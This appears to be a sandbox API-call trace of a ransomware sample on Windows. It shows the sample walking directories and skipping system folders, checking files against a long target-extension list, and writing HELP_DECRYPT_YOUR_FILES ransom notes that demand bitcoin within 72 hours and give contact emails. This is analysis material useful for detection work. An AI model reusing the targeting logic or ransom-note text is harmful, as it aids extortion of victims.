	[0175.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0175.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0175.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0175.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0175.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0175.194] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="..", cAlternateFileName="")) returned 1
	[0175.194] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0175.195] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0175.195] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0175.195] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\"
	[0175.195] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml"
	[0175.195] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0175.195] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.195] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0175.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.196] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.196] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml"
	[0175.196] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\power_0.provxml") returned 109
	[0175.196] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.196] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.196] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0175.197] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.197] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0175.197] FindNextFileW (in: hFindFile=0xfb95f0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb50367, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xeb50367, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xeb765cf, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x2a5, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0175.197] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 1
	[0175.197] FindClose (in: hFindFile=0xfb95f0 | out: hFindFile=0xfb95f0) returned 0
	[0175.198] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime"
	[0175.199] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*"
	[0175.199] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.199] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.199] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT") returned 121
	[0175.199] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.200] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.200] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.204] CloseHandle (hObject=0x39c) returned 1
	[0175.204] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x187cd8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x187cd8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.205] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.205] GetUserNameA (in: lpBuffer=0x187bbc, pcbBuffer=0x187cd4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x187cd4) returned 1
	[0175.207] wsprintfW (in: param_1=0x188b58, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.207] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.207] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0175.207] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0175.208] WriteFile (in: hFile=0x39c, lpBuffer=0x188b58*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x188c34, lpOverlapped=0x0 | out: lpBuffer=0x188b58*, lpNumberOfBytesWritten=0x188c34*=0x30, lpOverlapped=0x0) returned 1
	[0175.208] CloseHandle (hObject=0x39c) returned 1
	[0175.208] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.209] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.209] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0175.209] wsprintfW (in: param_1=0x188910, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML") returned 122
	[0175.209] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.215] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0175.215] WriteFile (in: hFile=0x39c, lpBuffer=0x188104*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x188c28, lpOverlapped=0x0 | out: lpBuffer=0x188104*, lpNumberOfBytesWritten=0x188c28*=0x808, lpOverlapped=0x0) returned 1
	[0175.218] CloseHandle (hObject=0x39c) returned 1
	[0175.219] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.219] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1880ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1880ec*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.219] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.220] GetUserNameA (in: lpBuffer=0x187fd0, pcbBuffer=0x1880e8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1880e8) returned 1
	[0175.221] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.221] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.221] SetFilePointer (in: hFile=0x39c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0175.221] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0175.221] WriteFile (in: hFile=0x39c, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0175.222] CloseHandle (hObject=0x39c) returned 1
	[0175.222] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x81f840c7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x310031, dwReserved1=0x7d0063, cFileName=".", cAlternateFileName="")) returned 0xfb9570
	[0175.223] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*") returned 97
	[0175.223] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.223] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*") returned 0x61
	[0175.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.223] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0175.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.223] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0175.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.224] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0175.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.224] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0175.224] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.224] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
